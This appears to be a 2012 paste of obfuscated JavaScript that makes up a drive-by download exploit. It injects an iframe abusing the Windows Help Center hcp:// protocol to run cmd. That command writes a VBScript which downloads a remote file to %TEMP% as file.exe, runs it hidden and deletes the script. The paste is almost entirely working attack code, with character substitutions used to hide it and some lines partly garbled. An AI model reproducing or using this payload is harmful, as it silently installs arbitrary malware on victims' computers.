

Jan 29th, 2012
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  1.  var iframe = "<iframe src=\"&#104;
  2. cp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>Run('cmd /c echo FileName ! @&#8470;
  3. TEMP&#8470;
  4. }
  5. file.exe@>>&#8470;
  6. TEMP&#8470;
  7. }
  8. go.gPs]]echo url!@
  9. {
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  11. TEMP&#8470;
  12. }
  13. go.gPs]]echo Set objHTTP ! CreateObject(@MSXML2.XMLHTTP@)>>&#8470;
  14. TEMP&#8470;
  15. }
  16. go.gPs]]echo Call objHTTP.Open(@GET@, url, False)>>&#8470;
  17. TEMP&#8470;
  18. }
  19. go.gPs]]echo objJOPA>>&#8470;
  20. TEMP&#8470;
  21. }
  22. go.gPs]]echo set oStream ! createobject(@Adodb.Stream@)>>&#8470;
  23. TEMP&#8470;
  24. }
  25. go.gPs]]echo Const adTypeBinary ! 1 >>&#8470;
  26. TEMP&#8470;
  27. }
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  29. TEMP&#8470;
  30. }
  31. go.gPs]]echo Const adSaveCreateNotExist ! 1 >>&#8470;
  32. TEMP&#8470;
  33. }
  34. go.gPs]]echo oStream.type ! adTypeBinary >>&#8470;
  35. TEMP&#8470;
  36. }
  37. go.gPs]]echo >>&#8470;
  38. TEMP&#8470;
  39. }
  40. go.gPs]]echo oStream.write objHTTP.responseBody>>&#8470;
  41. TEMP&#8470;
  42. }
  43. go.gPs]]echo oStream.savetofile FileName, adSaveCreateNotExist >>&#8470;
  44. TEMP&#8470;
  45. }
  46. go.gPs]]echo oStream.close>>&#8470;
  47. TEMP&#8470;
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  49. go.gPs]]echo set oStream ! nothing >>&#8470;
  50. TEMP&#8470;
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  52. go.gPs]]echo Set xml ! Nothing >>&#8470;
  53. TEMP&#8470;
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  55. go.gPs]]echo Set WshShell ! CreateObject(@WScript.Shell@) >>&#8470;
  56. TEMP&#8470;
  57. }
  58. go.gPs]]echo WshShell.Run FileName, 0, True >>&#8470;
  59. TEMP&#8470;
  60. }
  61. go.gPs]]echo Set FSO ! CreateObject(@Scripting.FileSystemObject@) >>&#8470;
  62. TEMP&#8470;
  63. }
  64. go.gPs]]echo FSO.DeleteFile @&#8470;
  65. TEMP&#8470;
  66. }
  67. go.vbs@ >>&#8470;
  68. TEMP&#8470;
  69. }
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  71. TEMP&#8470;
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  78. /g, String.fromCharCode(37)));
  79. </script>\">";
  80. document.write(iframe);
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